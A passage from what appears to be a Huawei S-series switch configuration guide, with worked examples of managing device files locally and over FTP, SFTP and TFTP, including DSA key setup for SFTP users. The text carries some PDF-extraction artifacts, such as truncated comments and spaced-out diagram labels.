directories, and files. The storages can be managed only by login users. However, only local
files can be managed after users log in to the device. To transfer files, you can use the FTP,
TFTP, Secure Copy Protocol (SCP), or FTPS mode.
Configuration Notes
l Before logging in to the device to manage files, complete the following task:
– Logging in to the device from a terminal
l This example applies to all versions and all models of S series switches.
A user logs in to the Switch using the console port, Telnet, or STelnet from the PC, and needs
to perform the following operations on the files on the Switch:
l View the files and subdirectories in the current directory.

l Create the directory test. Copy the file vrpcfg.zip to test and rename the file as
backup.zip.
l View files in test.
Figure 4-1 Networking diagram for logging in to the device to manage files
PC Switch
Procedure
Step 1 View the files and subdirectories in the current directory.
[Switch] quit
<Switch> dir
Directory of flash:/
Idx Attr Size(Byte) Date Time FileName

0 -rw- 889 Mar 01 2012 14:41:56 private-data.txt
1 -rw- 6,311 Feb 17 2012 14:05:04 backup.cfg
2 -rw- 2,393 Mar 06 2012 17:20:10 vrpcfg.zip
3 -rw- 812 Dec 12 2011 15:43:10 hostkey
4 drw- - Mar 01 2012 14:41:46 compatible
5 -rw- 540 Dec 12 2011 15:43:12 serverkey
...
509,256 KB total (52,752 KB free)

Step 2 Create the directory test. Copy the file vrpcfg.zip to test and rename the file as backup.zip.
# Create the directory test.
<Switch> mkdir test
Info: Create directory flash:/test......Done.
# Copy the file vrpcfg.zip to test and rename the file as backup.zip.
<Switch> copy vrpcfg.zip flash:/test/backup.zip //Set the target file name to
backup.zip. If not specified, the target file name is the same as the source file
name.
Copy flash:/vrpcfg.zip to flash:/test/backup.zip?[Y/N]:y
100% complete/
Info: Copied file flash:/vrpcfg.zip to flash:/test/backup.zip...Done.
Step 3 View files in test.

# Access test.
<Switch> cd test
# View the current directory.

<Switch> pwd
flash:/test
# View files in test.

<Switch> dir
Directory of flash:/test/

0 -rw- 2,399 Mar 12 2012 11:16:44 backup.zip
509,256 KB total (52,748 KB free)
----End
Configuration Files
#
sysname Switch
#
return
4.2 Example for Managing Files Using FTP

Overview
After a device is configured as an FTP server, users can access the device using the FTP client
software on the local terminals. Then the users can manage files between the device and local
terminals. The configuration for managing files using FTP is simple, and FTP supports file
transfer and file directory management.
FTP provides the authorization and authentication functions for managing files. However,
data is transferred in plaintext, which brings security risks.
FTP is applicable to file management when high network security is not required, and is often
used in version upgrades.

Configuration Notes
l Before managing files using FTP, complete the following tasks:
– Ensuring that routes are reachable between the terminal and the device
– Ensuring that the terminal functions the FTP client software
l The FTP protocol will bring risks to network security. The SFTP V2, Secure Copy
Protocol (SCP), or FTPS mode is recommended.
l If the number of FTP users on the device reaches the maximum value (5), new
authorized users cannot log in. To ensure that new FTP users successfully log in to the
device, FTP users that have completed file operations need to get offline.
As shown in Figure 4-2, the PC connects to the device, and IP address of the management
network interface on the device is 10.136.23.5. The device needs to be upgraded. The device
is required to function as the FTP server so that you can upload the system software from the
PC to the device and back up the configuration file to the PC.
Figure 4-2 Networking diagram for managing files using FTP
10.136.23.5/24
Internet
PC FTP_Server
1. Configure the FTP function for the device and information about an FTP user, including
the user name and password, user level, service type, and authorized directory.
2. Save the current configuration file on the device.
3. Connect the PC to the device using FTP.
4. Upload the system software to the device and back up the configuration file of the device
to the PC.
Procedure
Step 1 Configure the FTP function for the device and information about an FTP user.
[HUAWEI] sysname FTP_Server
[FTP_Server] ftp server enable //Enable the FTP server function.
[FTP_Server] aaa
[FTP_Server-aaa] local-user admin1234 password irreversible-cipher
[FTP_Server-aaa] local-user admin1234 privilege level 15 //Set the user level
to 15.
[FTP_Server-aaa] local-user admin1234 service-type ftp //Set the user service
type to FTP.
[FTP_Server-aaa] local-user admin1234 ftp-directory flash:/ //Set the FTP

service authorized directory to flash:/.

[FTP_Server-aaa] quit
[FTP_Server] quit
Step 2 Save the current configuration file on the device.

<FTP_Server> save
Step 3 Connect the PC to the device using FTP. Enter the user name admin1234 and password
Helloworld@6789 and set the file transfer mode to binary.
The following example assumes that the PC runs the Windows XP operating system.
C:\Documents and Settings\Administrator> ftp 10.136.23.5
User (10.136.23.5:(none)): admin1234
331 Password required for admin1234.
Password:
230 User logged in.
ftp> binary //Set the file transfer mode to binary. The default mode is ASCII.
200 Type set to I.
ftp>
The ASCII mode is used to transfer text files, and the binary mode is used to transfer
programs including the system software (with the file name extension of .cc, .bin, or .pat),
images, voices, videos, compressed packages, and database files.
Step 4 Upload the system software to the device and back up the configuration file of the device to
the PC.
# Upload the system software to the device.
ftp> put devicesoft.cc
150 Opening BINARY mode data connection for devicesoft.cc
ftp: 106616955 bytes sent in 151.05 Seconds 560.79Kbytes/sec.
# Back up the configuration file of the device to the PC.

ftp> get vrpcfg.zip
150 Opening BINARY mode data connection for vrpcfg.zip.
ftp: 1257 bytes received in 0.03Seconds 40.55Kbytes/sec.
NOTE
Before uploading and downloading files to the FTP server, determine the FTP working directory on the
FTP client. For example, the default FTP working directory on the Windows XP operating system is the
login user working directory (such as C:\Documents and Settings\Administrator). This directory also
stores the system software to be uploaded and backup configuration file.

# Run the dir command on the device to check whether the system software is uploaded to the
device.
<FTP_Server> dir

0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
2 -rw- 4 Nov 17 2011 09:33:58 snmpnotilog.txt
3 -rw- 11,238 Mar 12 2012 21:15:56 private-data.txt
4 -rw- 1,257 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
6 -rw- 106,616,955 Mar 13 2012 14:24:24 devicesoft.cc

7 drw- - Oct 31 2011 10:20:28 sysdrv

8 drw- - Feb 21 2012 17:16:36 compatible
9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 23,496 Dec 15 2011 20:59:36 20111215.zip
12 -rw- 588 Nov 04 2011 13:54:04 servercert.der
13 -rw- 320 Nov 04 2011 13:54:26 serverkey.der
14 drw- - Nov 04 2011 13:58:36 security
...
509,256 KB total (52,752 KB free)
# Check whether the file vrpcfg.zip is stored in the FTP working directory on the PC.
----End
Configuration Files
Configuration file of the FTP_Server
#
sysname FTP_Server
#
FTP server enable
#
aaa
local-user admin1234 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-\}Fqpe
$E<#H$J<6@KTSL/J'\}I-%^%#
local-user admin1234 ftp-directory flash:/
local-user admin1234 service-type ftp
#
return
Related Content
Videos
Remotely Transfer Files Using FTP.
4.3 Example for Managing Files Using SFTP

Overview
After a device is configured as an SFTP server, users can communicate with the device using
SFTP. The SSH protocol can be used to ensure connection security. SFTP implements data
encryption and protects data integrity, ensuring high security. The SFTP and FTP can be both
configured for the device.
SFTP is applicable to file management when high network security is required, and is often
used for downloading logs and backing up the configuration file.
Configuration Notes
l Before managing files using SFTP, complete the following tasks:
– Ensuring that routes are reachable between the terminal and the device
– Ensuring that the SSH client software has been installed on the terminal
l The SFTP V1 protocol will bring risks to network security. The SFTP V2 or FTPS mode
is recommended.

As shown in Figure 4-3, the PC connects to the device, and the IP address of the management
network interface on the device is 10.136.23.4. Files need to be securely transferred between
the PC and device to prevent man-in-the-middle attacks and some network attacks (such as
DNS spoofing and IP spoofing). Configure the device as the SSH server to provide the SFTP
service so that the SSH server can authenticate the client and encrypt data in bidirectional
mode to ensure secure file transfer.
Figure 4-3 Networking diagram for managing files using SFTP
10.136.23.4/24
Internet
PC SSH_Server
1. Generate a local key pair on the SSH server and enable the SFTP server function to
implement secure data exchange between the server and client.
2. Configure VTY user interfaces on the SSH server.
3. Configure an SSH user, including the authentication mode, service type, SFTP
authorized directory, user name, and password.
4. Use the third-party software OpenSSH to access the SSH server.
Procedure
Step 1 Generate a local key pair on the SSH server and enable the SFTP server function.
[HUAWEI] sysname SSH_Server
[SSH_Server] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be:
SSH_Server_Host_DSA.
Info: The key modulus can be any one of the following : 1024,
2048.
Info: If the key modulus is greater than 512, it may take a few
minutes.
Please input the modulus [default=2048]: //Press Enter. The default key length
(2048 bits) is used.
Info: Generating
keys...

[SSH_Server] sftp server enable //Enable the SFTP server function.
Step 2 # Configure VTY user interfaces on the SSH_Server.

[SSH_Server] user-interface vty 0 14 //Enter the user interface views of VTY 0
to VTY 14.
[SSH_Server-ui-vty0-14] authentication-mode aaa //Set the authentication mode

of users in VTY 0 to VTY 14 to AAA.

[SSH_Server-ui-vty0-14] protocol inbound ssh //Configure the user interface
views of VTY 0 to VTY 14 to support SSH.
[SSH_Server-ui-vty0-14] quit
Step 3 Configure an SSH user, including the authentication mode, service type, SFTP authorized
directory, user name, and password.
[SSH_Server] ssh user client001 authentication-type password //Set the
authentication mode to password authentication.
[SSH_Server] ssh user client001 service-type sftp //Set the user service type
to SFTP.
[SSH_Server] ssh user client001 sftp-directory flash: //Set the SFTP service
authorized directory to flash:.
[SSH_Server] aaa
[SSH_Server-aaa] local-user client001 password irreversible-cipher
[SSH_Server-aaa] local-user client001 privilege level 15 //Set the user level
to 15.
[SSH_Server-aaa] local-user client001 service-type SSH //Set the user service
type to SSH.
[SSH_Server-aaa] quit
Step 4 Access the SFTP server using OpenSSH.

OpenSSH commands can be used in the Windows Command Prompt window only after the
OpenSSH software is installed.
NOTE
Ensure that the OpenSSH version matches the operating system of the PC. Otherwise, you may fail to
access the device using SFTP.
Figure 4-4 Windows Command Prompt window
After the PC connects to the device using the third-party software, enter the SFTP view to
perform file operations.
----End
Configuration Files
Configuration file of the SSH_Server
#
sysname SSH_Server
#
aaa

local-user client001 password irreversible-cipher %^%#-=9Z)M,-aL$_U%#$W^1T-\}Fqpe

$E<#H$J<6@KTSL/J'\}I-%^%#
local-user client001 service-type ssh
#
sftp server enable
ssh user client001
ssh user client001 authentication-type password
ssh user client001 service-type sftp
ssh user client001 sftp-directory flash:
#
#
return
4.4 Example for Accessing Files on Other Devices Using

TFTP
Overview
After a device is configured as a TFTP client, it can access the remote TFTP server to upload
and download files on the TFTP server. When you access other devices using TFTP, you do
not need to enter the user name or password, simplifying information exchange. TFTP has no
authorization or authentication mechanism and transfers data in plaintext, which brings
security risks and is vulnerable to network viruses and attacks. Exercise caution when using
TFTP.
On a good-performance LAN in a lab, TFTP can be used for the system software loading and
upgrade.
Configuration Notes
l Before accessing files on the TFTP server, ensure that routes are reachable between the
device and TFTP server.
l The device can only function as a TFTP client.
l The TFTP mode supports only file transfer, but does not support interaction.
l TFTP has no authorization or authentication mechanism and transfers data in plaintext,
which brings security risks and is vulnerable to network viruses and attacks.
As shown in Figure 4-5, the remote server at IP address 10.1.1.1/24 functions as the TFTP
server. The device at IP address 10.2.1.1/24 functions as the TFTP client and has reachable
routes to the TFTP server.
The device needs to be upgraded. You need to download the system software from the TFTP
server to the device and back up the current configuration file of the device to the TFTP
server.

Figure 4-5 Networking diagram for accessing files on another device using TFTP
1 0 .2 .1 .1 /2 4 1 0 .1 .1 .1 /2 4
In te rn e t
T F T P C lie n t T F T P S e rv e r
1. Run the TFTP software on the TFTP server and set the TFTP working directory.
2. Upload and download files on the device using TFTP commands.
Procedure
Step 1 Run the TFTP software on the TFTP server and set the TFTP working directory. For the
detailed operations, see the help document of the third-party TFTP software.
Step 2 Upload and download files on the device using TFTP commands.
<HUAWEI> tftp 10.1.1.1 get devicesoft.cc //Download devicesoft.cc.
Info: Transfer file in binary
mode.
Downloading the file from the remote TFTP server. Please

wait...
|
TFTP: Downloading the file

successfully.
106616955 byte(s) received in 722 second(s).

<HUAWEI> tftp 10.1.1.1 put vrpcfg.zip //Upload vrpcfg.zip.
Info: Transfer file in binary
mode.
Uploading the file to the remote TFTP server. Please

wait...
100%
TFTP: Uploading the file

successfully.
7717 byte(s) sent in 1 second(s).

# Run the dir command on the device to check whether the system software is downloaded to
the device.
<HUAWEI> dir

0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
4 -rw- 7,717 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
7 drw- - Oct 31 2011 10:20:28 sysdrv


9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 43,496 Dec 15 2011 20:59:36 20111215.zip
14 drw- - Nov 04 2011 13:58:36 security
...
509,256 KB total (52,752 KB free)
# Check whether the file vrpcfg.zip is stored in the working directory on the TFTP server.
----End
Configuration Files
None

FTP
Overview
After a device is configured as an FTP client, it can log in to the FTP server for transferring
files and managing files and directories on the FTP server. The configuration for accessing
other devices using FTP is simple, and FTP supports file transfer and file directory
management. FTP provides the authorization and authentication functions for managing files.
However, data is transferred in plaintext, which brings security risks.
FTP is applicable to file transfer when high network security is not required, and is often used
for downloading the system software from the FTP server and backing up the configuration
file.
Configuration Notes
l Before accessing files on the FTP server, ensure that routes are reachable between the
device and FTP server.
l The FTP protocol will bring risks to network security. The SFTP V2, Secure Copy
Protocol (SCP), or FTPS mode is recommended.
As shown in Figure 4-6, the remote server at IP address 10.1.1.1/24 functions as the FTP
server. The device at IP address 10.2.1.1/24 functions as the FTP client and has reachable
routes to the FTP server.
The device needs to be upgraded. You need to download the system software from the FTP
server to the device and back up the current configuration file of the device to the FTP server.
Figure 4-6 Networking diagram for accessing files on another device using FTP
1 0 .2 .1 .1 /2 4 1 0 .1 .1 .1 /2 4
In te rn e t
F T P C lie n t F T P S e rv e r

1. Run the FTP software on the FTP server and configure an FTP user.
2. Use FTP to connect the device to the FTP server.
3. Upload and download files on the device using FTP commands.
Procedure
Step 1 Run the FTP software on the FTP server and configure an FTP user. For the detailed
operations, see the help document of the third-party FTP software.
Step 2 Use FTP to connect the device to the FTP server.
<HUAWEI> ftp 10.1.1.1
Trying 10.1.1.1 ...
Press CTRL+K to abort
User(10.1.1.1:(none)):admin
331 Password required for admin.
Enter password:
230 User logged in.
Step 3 Upload and download files on the device using FTP commands.
[ftp] binary //Set the file transfer mode to binary. The default mode is ASCII.
[ftp] get devicesoft.cc //Download the system software on the FTP server to the
device.
[ftp] put vrpcfg.zip //Upload the backup configuration file on the device to
the FTP server.
[ftp] quit
The ASCII mode is used to transfer text files, and the binary mode is used to transfer
programs including the system software (with the file name extension of .cc, .bin, or .pat),
images, voices, videos, compressed packages, and database files.
# Run the dir command on the device to check whether the system software is downloaded to
the device.
<HUAWEI> dir

0 -rw- 14 Mar 13 2012 14:13:38 back_time_a
1 drw- - Mar 11 2012 00:58:54 logfile
4 -rw- 7,717 Mar 12 2012 21:15:54 vrpcfg.zip
5 -rw- 14 Mar 13 2012 14:13:38 back_time_b
7 drw- - Oct 31 2011 10:20:28 sysdrv
9 drw- - Feb 09 2012 14:20:10 selftest
10 -rw- 19,174 Feb 20 2012 18:55:32 backup.cfg
11 -rw- 43,496 Dec 15 2011 20:59:36 20111215.zip
14 drw- - Nov 04 2011 13:58:36 security
...

509,256 KB total (52,752 KB free)
# Check whether the file vrpcfg.zip is stored in the working directory on the FTP server.
----End
Configuration Files
None

SFTP
Overview
SFTP is an SSH-based secure file transfer protocol, which uses secure connections for data
transmission. After a device is configured as an SFTP client, the remote SFTP server can
authenticate the client and encrypt data in bidirectional mode to ensure secure file transfer and
directory management.
SFTP is applicable to accessing files on other devices when high network security is required,
and is used for uploading and downloading logs.
Configuration Notes
l Before accessing files on the SSH server using SFTP, ensure that routes are reachable
between the device and SSH server.
l The SFTP V1 protocol will bring risks to network security. The SFTP V2 or FTPS mode
is recommended.
As shown in Figure 4-7, the routes between the SSH server and clients client001 and
client002 are reachable. A Huawei device is used as the SSH server in this example.
The clients client001 and client002 are required to connect to the SSH server in password and
DSA authentication modes respectively to ensure secure access to files on the SSH server.
Figure 4-7 Networking diagram for accessing files on another device using SFTP
10.2.1.1/24
client001 10.1.1.1/24
Internet
SSH Server
10.3.1.1/24
client002

1. Generate a local key pair on the SSH server and enable the SFTP server function to
implement secure data exchange between the server and client.
2. Configure the clients client001 and client002 on the SSH server to log in to the SSH
server in password and DSA authentication modes.
3. Generate a local key pair on client002 and configure the generated DSA public key on
the SSH server, which implements authentication for the client when a user logs in to the
server from the client.
4. On the SSH server, enable client001 and client002 to log in to the SSH server using
SFTP and access the files.
Procedure
Step 1 On the SSH server, generate a local key pair and enable the SFTP server function.
[HUAWEI] sysname SSH Server
[SSH Server] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: SSH
Server_Host_DSA.
2048.
minutes.
Info: Generating
keys........

[SSH Server] sftp server enable //Enable the SFTP server function.
Info: Succeeded in starting the SFTP server.
Step 2 Create SSH users on the SSH server.

# Configure VTY user interfaces on the SSH server.
[SSH Server] user-interface vty 0 4 //Enter the user interface views of VTY 0
to VTY 4.
[SSH Server-ui-vty0-4] authentication-mode aaa //Set the authentication mode of
[SSH Server-ui-vty0-4] protocol inbound ssh //Configure the user interface
views of VTY 0 to VTY 4 to support SSH.
[SSH Server-ui-vty0-4] user privilege level 3 //Set the user level to 3.
[SSH Server-ui-vty0-4] quit
# Create an SSH user named client001 and configure the password authentication mode for
the user.
[SSH Server] ssh user client001 //Create an SSH user.
[SSH Server] ssh user client001 authentication-type password //Set the
authentication mode to password authentication.
[SSH Server] ssh user client001 service-type sftp //Set the user service type
to SFTP.
[SSH Server] ssh user client001 sftp-directory flash: //Set the SFTP service
[SSH Server] aaa
[SSH Server-aaa] local-user client001 password irreversible-cipher
[SSH Server-aaa] local-user client001 service-type ssh //Set the user service

type to SSH.
[SSH Server-aaa] local-user client001 privilege level 3 //Set the user level to
3.
[SSH Server-aaa] quit
# Create an SSH user named client002 and configure the DSA authentication mode for the
user.
[SSH Server] ssh user client002 //Create an SSH user.
[SSH Server] ssh user client002 authentication-type dsa //Set the
authentication mode to DSA authentication.
[SSH Server] ssh user client002 service-type sftp //Set the user service type
to SFTP.
[SSH Server] ssh user client002 sftp-directory flash: //Set the SFTP service
Step 3 Generate a local key pair on client002 and configure the generated DSA public key on the
SSH server.
# Generate a local key pair on client002.
[HUAWEI] sysname client002
[client002] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: SSH
Server_Host_DSA.
2048.
minutes.
Info: Generating
keys........
# Check the DSA public key generated on client002.

[client002] display dsa local-key-pair public
=====================================================
Time of Key pair created:2014-08-27

06:35:16+08:00
Key name :
client002_Host_DSA
Key modulus :
2048
Key type : DSA encryption

Key
Key fingerprint:
b7:68:86:90:d8:19:f3:e6:4a:f2:e9:fd:e4:24:ef:a5
=====================================================
Key code:
30820322
02820100
DEDEBA5C 8244DCB8 E696917C EFEBC0B3

E6FB60BE

8B9E36D3 E4EB9CD6 EB7FD210 219AC0F4

1AD47BF1
EACD435D 39AFA8FA CB6A7819 305EE147

E428912E
60452B37 CA17D611 C2EE4C46 B4BC7726

54C26856
A99ECFA5 D800367B 31A90522 F139496F

4182DBFD
AAB59973 9AB02185 856A881F 9197368B

92DBF684
9D1C746B A27E12F9 8A28E4B6 D0587D65

5979A750
5413E91E FC961C3F 79209625 CFA8D7D4

69FA35A3
9E37B614 047D535D CD63AF30 58B3A25B

79C714B6
326B7DB6 067EBF15 3CC1A720 B0E1A7E3

9C13FEB3
BA26E6B0 52DC5BFF EE7C5C52 148FE6C2

40738FBB
8F05D416 B2B5DD72 E3629BB5 9244BF9F

A29C4FCD
4EA0EE50 1FC6695D 03D68D51

9324E493
0214
C6C484E1 F0076B8A FCAD302B 98B50A3A

542ABEBB
02820100
3AC11746 EE959CBD 30F669C5 7E290BC4

7CB5BBFD
96AE9215 7A29C723 72FE8A02 EBED3B76

BE810B42
21AD8D32 F7723F83 59F46B66 FF7805CC

3F86D5D6
5BD424BD 70677EFF 1ACF9B3C CE02CD40

46560DA4
2036205C 6EFAB148 66E6A106 0DF6258B

EE31CFE7
4B6C59B4 6FE59A9F BE64F982 EC36A669

FF597FB7
9A56E32E C15A0659 3D17C407 29F587C7

74959017
62B08070 24564B2E E79C6E1D 86793548

76CC662A

1D3DE1D1 2C79E102 C0B10E5C 9C4428B3

AEB93278
26D4CDE5 189A93EA 531E0FF8 2199EF35

DF038976
4538434F F39924F0 5BF17AC8 8E340991

B5EA0A62
A915EE63 F660C092 360C5D2D 796AF230

DB7461F7
C15B6DBA 65C9EFAB 247DB13D

4942E2FF
02820100
D7C6399A 86F7B38C 85168EF8 692BD9B4

01AA7BCD
98559075 98039259 0C54818C 650A95C7

0A5250EB
12124E5B C4123350 C190CC8B 4FFFD418

7E8F113F
6C36AB4B A56D2D1D 2C874C75 8400DAFE

4BABF957
4EDC8E7C DF5934DB 3AD717E5 50B1096B

C0B46DE5
3FB508FA CB76FF1C 42CF7082 7DDEEB47

5C5C4F64
B1C8815C 496AC1E0 04C10EDD FE849B76

6DA15B48
0C9CF0B1 10BDDC08 41A65C28 8E21ADC6

48A93DF6
14552C1F 76A401AE E06E482D 6582052E

5B11A678
A467B38A B77C1C55 D367E253 FFA44841

FC38A462
B9AC24E6 DAD01628 F09ED629 58F666C1

1DEF7BD0
634C3D13 D75F2614 8CB49AFC 498A5195

F443CA4D
C02FF228 A90D7593 AE46C5D0 4B224FEE
Host public key for PEM format

code:
---- BEGIN SSH2 PUBLIC KEY

----
AAAAB3NzaC1kc3MAAAEBAN7eulyCRNy45paRfO/rwLPm+2C
+i5420+TrnNbrf9IQ
IZrA9BrUe/HqzUNdOa+o
+stqeBkwXuFH5CiRLmBFKzfKF9YRwu5MRrS8dyZUwmhW

qZ7PpdgANnsxqQUi8TlJb0GC2/2qtZlzmrAhhYVqiB
+RlzaLktv2hJ0cdGuifhL5
iijkttBYfWVZeadQVBPpHvyWHD95IJYlz6jX1Gn6NaOeN7YUBH1TXc1jrzBYs6Jb
eccUtjJrfbYGfr8VPMGnILDhp+OcE/6zuibmsFLcW//ufFxSFI/
mwkBzj7uPBdQW
srXdcuNim7WSRL+fopxPzU6g7lAfxmldA9aNUZMk5JMAAAAVAMbEhOHwB2uK/
K0w
K5i1CjpUKr67AAABADrBF0bulZy9MPZpxX4pC8R8tbv9lq6SFXopxyNy/
ooC6+07
dr6BC0IhrY0y93I/g1n0a2b/eAXMP4bV1lvUJL1wZ37/Gs
+bPM4CzUBGVg2kIDYg
XG76sUhm5qEGDfYli+4xz+dLbFm0b+Wan75k+YLsNqZp/1l/
t5pW4y7BWgZZPRfE
Byn1h8d0lZAXYrCAcCRWSy7nnG4dhnk1SHbMZiodPeHRLHnhAsCxDlycRCizrrky
eCbUzeUYmpPqUx4P+CGZ7zXfA4l2RThDT/
OZJPBb8XrIjjQJkbXqCmKpFe5j9mDA
kjYMXS15avIw23Rh98Fbbbplye
+rJH2xPUlC4v8AAAEAVkz2m0fokxPL5DekN8U4
2SkvxBhh7W+pMLesuDOBY9PIqfwcZqY23Oi7/eJGojmX0wYTOWi8t09Qn/
LmeFNt
AEaxHc4nLmvjxDuyjoTSA/AAYJDYJ6HWZoScy3mzDCUtEMGuaL/
6SRUuH5wf9hMf
LZzmb6ETrf8S5RZWVyZv3TKm3/
FEAH7PNQYe8BYYG3SCfvgtqYQzRTZrDL6wLbCo
otdHydlhfz9CtIYH3gfhnjXoq/
X6HLQAFTexhBuoJ7nCtjC9c1HhJFicadQK2iY/
AOOu8jCp0l6vOUH4cniOONh6Mts9UiJNYnvZsjVJFzdkRsNpvcMBhK4/
NneGPPMN
+A==
---- END SSH2 PUBLIC KEY

----
Public key code for pasting into OpenSSH authorized_keys

file :
ssh-dss AAAAB3NzaC1kc3MAAAEBAN7eulyCRNy45paRfO/rwLPm+2C+i5420+TrnNbrf9IQIZrA9BrUe/
HqzUNdOa+o+stqeBkwXuFH5CiRLmBFKzfKF9YRwu5MRrS8dyZU
wmhWqZ7PpdgANnsxqQUi8TlJb0GC2/2qtZlzmrAhhYVqiB
+RlzaLktv2hJ0cdGuifhL5iijkttBYfWVZeadQVBPpHvyWHD95IJYlz6jX1Gn6NaOeN7YUBH1TXc1jrzBY
s6Jb
eccUtjJrfbYGfr8VPMGnILDhp+OcE/6zuibmsFLcW//ufFxSFI/mwkBzj7uPBdQWsrXdcuNim7WSRL
+fopxPzU6g7lAfxmldA9aNUZMk5JMAAAAVAMbEhOHwB2uK/K0wK5i1
CjpUKr67AAABADrBF0bulZy9MPZpxX4pC8R8tbv9lq6SFXopxyNy/ooC6+07dr6BC0IhrY0y93I/
g1n0a2b/eAXMP4bV1lvUJL1wZ37/Gs+bPM4CzUBGVg2kIDYgXG76sUhm
5qEGDfYli+4xz+dLbFm0b+Wan75k+YLsNqZp/1l/
t5pW4y7BWgZZPRfEByn1h8d0lZAXYrCAcCRWSy7nnG4dhnk1SHbMZiodPeHRLHnhAsCxDlycRCizrrkyeC
bUzeUYmpPq
Ux4P+CGZ7zXfA4l2RThDT/OZJPBb8XrIjjQJkbXqCmKpFe5j9mDAkjYMXS15avIw23Rh98Fbbbplye
+rJH2xPUlC4v8AAAEAVkz2m0fokxPL5DekN8U42SkvxBhh7W+pMLes
uDOBY9PIqfwcZqY23Oi7/eJGojmX0wYTOWi8t09Qn/LmeFNtAEaxHc4nLmvjxDuyjoTSA/
AAYJDYJ6HWZoScy3mzDCUtEMGuaL/6SRUuH5wf9hMfLZzmb6ETrf8S5RZWVyZv
3TKm3/FEAH7PNQYe8BYYG3SCfvgtqYQzRTZrDL6wLbCootdHydlhfz9CtIYH3gfhnjXoq/
X6HLQAFTexhBuoJ7nCtjC9c1HhJFicadQK2iY/AOOu8jCp0l6vOUH4cniOONh6
Mts9UiJNYnvZsjVJFzdkRsNpvcMBhK4/NneGPPMN+A== dsa-key
# Configure the generated DSA public key on the SSH server. The bold part in the display
command output indicates the generated DSA public key. Copy the key to the SSH server.

[SSH Server] dsa peer-public-key dsakey001 encoding-type der

[SSH Server-dsa-public-key] public-key-code begin
[SSH Server-dsa-key-
code]30820322
code]02820100
[SSH Server-dsa-key-code]DEDEBA5C 8244DCB8 E696917C EFEBC0B3

E6FB60BE
[SSH Server-dsa-key-code]8B9E36D3 E4EB9CD6 EB7FD210 219AC0F4
1AD47BF1
[SSH Server-dsa-key-code]EACD435D 39AFA8FA CB6A7819 305EE147
E428912E
[SSH Server-dsa-key-code]60452B37 CA17D611 C2EE4C46 B4BC7726
54C26856
[SSH Server-dsa-key-code]A99ECFA5 D800367B 31A90522 F139496F
4182DBFD
[SSH Server-dsa-key-code]AAB59973 9AB02185 856A881F 9197368B
92DBF684
[SSH Server-dsa-key-code]9D1C746B A27E12F9 8A28E4B6 D0587D65
5979A750
[SSH Server-dsa-key-code]5413E91E FC961C3F 79209625 CFA8D7D4
69FA35A3
[SSH Server-dsa-key-code]9E37B614 047D535D CD63AF30 58B3A25B
79C714B6
[SSH Server-dsa-key-code]326B7DB6 067EBF15 3CC1A720 B0E1A7E3
9C13FEB3
[SSH Server-dsa-key-code]BA26E6B0 52DC5BFF EE7C5C52 148FE6C2
40738FBB
[SSH Server-dsa-key-code]8F05D416 B2B5DD72 E3629BB5 9244BF9F
A29C4FCD
[SSH Server-dsa-key-code]4EA0EE50 1FC6695D 03D68D51
9324E493
code]0214
[SSH Server-dsa-key-code]C6C484E1 F0076B8A FCAD302B 98B50A3A

542ABEBB
code]02820100
[SSH Server-dsa-key-code]3AC11746 EE959CBD 30F669C5 7E290BC4

7CB5BBFD
[SSH Server-dsa-key-code]96AE9215 7A29C723 72FE8A02 EBED3B76
BE810B42
[SSH Server-dsa-key-code]21AD8D32 F7723F83 59F46B66 FF7805CC
3F86D5D6
[SSH Server-dsa-key-code]5BD424BD 70677EFF 1ACF9B3C CE02CD40
46560DA4
[SSH Server-dsa-key-code]2036205C 6EFAB148 66E6A106 0DF6258B
EE31CFE7
[SSH Server-dsa-key-code]4B6C59B4 6FE59A9F BE64F982 EC36A669
FF597FB7
[SSH Server-dsa-key-code]9A56E32E C15A0659 3D17C407 29F587C7
74959017
[SSH Server-dsa-key-code]62B08070 24564B2E E79C6E1D 86793548
76CC662A
[SSH Server-dsa-key-code]1D3DE1D1 2C79E102 C0B10E5C 9C4428B3
AEB93278
[SSH Server-dsa-key-code]26D4CDE5 189A93EA 531E0FF8 2199EF35
DF038976
[SSH Server-dsa-key-code]4538434F F39924F0 5BF17AC8 8E340991
B5EA0A62
[SSH Server-dsa-key-code]A915EE63 F660C092 360C5D2D 796AF230
DB7461F7
[SSH Server-dsa-key-code]C15B6DBA 65C9EFAB 247DB13D
4942E2FF

code]02820100
[SSH Server-dsa-key-code]D7C6399A 86F7B38C 85168EF8 692BD9B4

01AA7BCD
[SSH Server-dsa-key-code]98559075 98039259 0C54818C 650A95C7
0A5250EB
[SSH Server-dsa-key-code]12124E5B C4123350 C190CC8B 4FFFD418
7E8F113F
[SSH Server-dsa-key-code]6C36AB4B A56D2D1D 2C874C75 8400DAFE
4BABF957
[SSH Server-dsa-key-code]4EDC8E7C DF5934DB 3AD717E5 50B1096B
C0B46DE5
[SSH Server-dsa-key-code]3FB508FA CB76FF1C 42CF7082 7DDEEB47
5C5C4F64
[SSH Server-dsa-key-code]B1C8815C 496AC1E0 04C10EDD FE849B76
6DA15B48
[SSH Server-dsa-key-code]0C9CF0B1 10BDDC08 41A65C28 8E21ADC6
48A93DF6
[SSH Server-dsa-key-code]14552C1F 76A401AE E06E482D 6582052E
5B11A678
[SSH Server-dsa-key-code]A467B38A B77C1C55 D367E253 FFA44841
FC38A462
[SSH Server-dsa-key-code]B9AC24E6 DAD01628 F09ED629 58F666C1
1DEF7BD0
[SSH Server-dsa-key-code]634C3D13 D75F2614 8CB49AFC 498A5195
F443CA4D
[SSH Server-dsa-key-code]C02FF228 A90D7593 AE46C5D0 4B224FEE
[SSH Server-dsa-key-code] public-key-code end
[SSH Server-dsa-public-key] peer-public-key end
# On the SSH server, bind the DSA public key to client002.

[SSH Server] ssh user client002 assign dsa-key dsakey001
